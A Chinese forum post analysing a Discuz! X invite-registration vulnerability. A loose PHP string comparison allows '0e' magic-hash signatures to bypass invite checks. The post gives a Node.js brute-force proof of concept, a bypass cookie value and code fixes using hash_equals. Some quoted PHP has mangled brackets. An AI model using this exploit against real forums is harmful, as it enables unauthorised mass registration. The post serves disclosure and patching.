背景在 Discuz! X 发布前,Discuz! 就有邀请注册功能。管理员可以通过开启邀请注册,让游客需要邀请码注册。根据 论坛运营的性质,游客需要通过他人邀请,或者通过分享等获取邀请码。 在 Discuz! X 系列中,为了方便论坛的运营,Discuz! 加入了一种批量邀请链接。管理员可以发布这个链接,让无限用户不限次数的注册: 这个链接的显示条件是:1. 论坛开启了邀请注册功能 2.登录用户对应的用户组有邀请权限 3.该用户组分享邀请码的价格是 0 需要指出的是,论坛中的所有用户都有这个链接,只是不符合上述条件,这个链接不会在前台显示。 home.php?mod=invite&u=1&c=7854219ad4fd3d1b
观察链接,主要有 u 和 c 两个参数,其中 u 是邀请者的 uid,c 是用于校验 u 的“签名”。换句话说,如果 c 的生成算法/验证方式有漏洞,相当于可以获取任意 uid 的邀请链接权限,我们先来看看 c 的生成算法。 生成算法文件: source/include/spacecp/spacecp_invite.php - function getinviteurl($inviteid, $invitecode, $appid) {
- global $_G;
- if($inviteid && $invitecode) {
- $inviteurl = getsiteurl()."home.php?mod=invite&id={$inviteid}&c={$invitecode}";
- } else { // 批量邀请链接走的这个逻辑
- // space_key 就是 c 的生成函数。注意这里的 $appid 用不到,传值为空
- $invite_code = space_key($_G['uid', $appid);
- $inviteapp = $appid?"&app=$appid":'';
- $inviteurl = getsiteurl()."home.php?mod=invite&u=$_G[uid]&c=$invite_code{$inviteapp}";
- }
- return $inviteurl;
- }
文件: source/function/function_core.php - function space_key($uid, $appid=0) {
- global $_G;
- return substr(md5($_G['setting'['siteuniqueid'.'|'.$uid.(empty($appid)?'':'|'.$appid)), 8, 16);
- }
其中 $appid 默认为 0,即 c 就是 md5($siteuniqueid.'|'.$uid)的中间 16 个字符。 也就是说,只要有 siteuniqueid,就可以生成出任意 $uid 的 c 签名。站点的 siteuniqueid 怎么获得?嗯,看了一下 Discuz 代码,得出的答案是:一般获取不到。接下来看看 c 的验证方式。 注意:DZ建站学习研究分享的部分应用在安装中会上报 siteuniqueid,这些应用的开发者或许就知道该站点的 siteuniqueid。这是一个小安全漏洞,但不是本文的主题。
验证方式1. 邀请引导页邀请引导页即我们上面提到的 home.php?mod=invite&u=****&c=**** 文件: source/module/home/home_invite.php - } elseif ($uid) {
- $id = 0;
- // 生成用于比对的 $invite_code (签名)
- $invite_code = space_key($uid, $appid);
- // [1] 将用户提交的 c 签名与 $invite_code 进行比较
- if($_GET['c' != $invite_code) {
- showmessage('invite_code_error', '', array(), array('return' => true));
- }
- $inviteuser = getuserbyuid($uid);
- loadcache('usergroup_'.$inviteuser['groupid');
- // [2] 邀请者 uid 所在的用户组的邀请码分享价格为 0
- if(!empty($_G['cache'['usergroup_'.$inviteuser['groupid') && $_G['cache'['usergroup_'.$inviteuser['groupid'['inviteprice') {
- showmessage('invite_code_error', '', array(), array('return' => true));
- }
- // 通过以上 [1] [2] 两个判断后,设置 cookies
- $cookievar = "$uid,$invite_code,$appid";
- }
看似两处判断都很合理,没有问题。其实 [1] 处的判断是有漏洞的。 其中字符串比较漏洞的利用较简单,这里我们讨论看看。 在 php 中执行 var_dump("0" == "0e12345678901234"),结果是 true。这是因为 php 将后者当作科学计数法来解析,解析结果是 0 (0 * 10 ^ 12345678901234 = 0)。因此比较结果为 true。 c 的值是可控的,如此一来,我们只需让 space_key 生成出一个形如 0e12345678901234 的字符串即可绕过 [1] 处的判断,有办法做到吗? 回到上面的生成算法,space_key 是 md5($siteuniqueid.'|'.$uid)的中间 16 个字符,而 md5 的 hex 结果恰恰是在 [0-9a-f] 之间,也就是完全有可能生成符合规则的漏洞字符串。有多大的几率呢? (1/16)^2 * (10/16)^14 = 0.00054210%
换句话说,大约每生成 20 万次,就能出现一个 0e[0-9]{14} 形式的字符串,用以绕过这个判断。20 万个 http 请求在实践中是可行的。 因为这个页面只是生成一串用户可控的 cookies 用于注册页面:$uid,$invite_code,$appid,我们不讨论 [2] 的判断(条件有些复杂),直接看注册页面的邀请链接验证代码。 2. 注册页面文件:source/function/function_member.php - function getinvite() {
- ...
- // 接收到 cookies,进入条件判断
- } elseif($cookiecount == 3) {
- $uid = intval($cookies[0);
- $code = trim($cookies[1);
- $appid = intval($cookies[2);
- $invite_code = space_key($uid, $appid);
- // [1] 跟上面一模一样的判断方式,依然可以绕过
- if($code == $invite_code) {
- $inviteprice = 0;
- $member = getuserbyuid($uid);
- // 这里假设这个 $uid 对应的用户不存在,那取出来的结果为 false, 不进入下面的判断
- if($member) {
- $usergroup = C::t('common_usergroup')->fetch($member['groupid');
- $inviteprice = $usergroup['inviteprice';
- }
- // $inviteprice 为 0,不进入下面的判断
- if($inviteprice > 0) return array();
- // 成功将提交的 $uid 设置进变量 ^_^
- $result['uid' = $uid;
- $result['appid' = $appid;
- }
- }
- // 通过验证
- if($result['uid') {
- $member = getuserbyuid($result['uid');
- $result['username' = $member['username';
- } else {
- dsetcookie('invite_auth', '');
- }
- // 返回“邀请码有效”的结果,允许注册 ^_^
- return $result;
- }
注册页面只要过了 [1] 处的判断,并传入一个不存在的、并且能生成出指定格式的签名的邀请者 $uid,此后的校验畅通无阻,直接返回邀请码有效。 至此,只需通过 20 万个请求爆破出一个可生成出特殊格式 space_key 的 uid,即可通过该 uid 和为 “0” 的 c 签名,绕过邀请码无限注册用户。 PoC- const fetch = require('node-fetch')
- ;(async function () {
- let start = 1
- let max = 500000
- for (let i = start; i <= max; i++) {
- ;(async function (i) {
- if (await test(i)) {
- console.log('※found! uid: ' + i)
- }
- })(i)
- await sleep(20)
- if (i % 200 === 0) {
- console.log('current: ' + i + '/' + max)
- }
- }
- })()
- async function test(uid) {
- let res = await fetch('http://localhost/dz/home.php?mod=invite&u=' + uid + '&c=0')
- let text = await res.text()
- return !!text.match('bm_h mt') || // 成功进入邀请注册页面,直接注册
- !!text.match('用户空间不存在') // 成功绕过 c 签名判断,虽然 uid 不存在,依然可以设置 cookies,直接在注册页面注册
- }
- function sleep(ms) {
- return new Promise(resolve => setTimeout(resolve, ms))
- }
设置一下 Cookies: Edb6_2132_invite_auth=194077,0,0 修复1. siteuniqueid 易被插件开发者获得,一旦拥有 siteuniqueid,无需爆破即可直接生成邀请链接。建议修改使用 authkey 生成。 文件: source/function/function_core.php 查找 - return substr(md5($_G['setting'['siteuniqueid'.'|'.$uid.(empty($appid)?'':'|'.$appid)), 8, 16);
替换为 - return substr(md5($_G['config'['security'['authkey'.'|DZXINVITE|'.$uid.(empty($appid)?'':'|'.$appid)), 8, 16);
文件: source/module/home/home_invite.php 查找 - if($_GET['c' != $invite_code) {
替换为 - if(!hash_equals($_GET['c', $invite_code)) {
文件: source/function/function_member.php 查找 - if($code == $invite_code) {
替换为 - if(hash_equals($code, $invite_code)) {
注意:hash_equals 函数只支持 PHP >= 5.6.0,旧版 PHP 需自行实现该函数。
3. 对于不存在的邀请者 uid,不允许注册。 4. 对于没有邀请权限的邀请者(目前只判断邀请码价格是否为 0),不允许注册。 修复 1、2 后,问题 3、4 影响不大。修复方式略。
| 
帐号登录
QQ登录
微信登录
发表于 2017-8-14 14:15:30
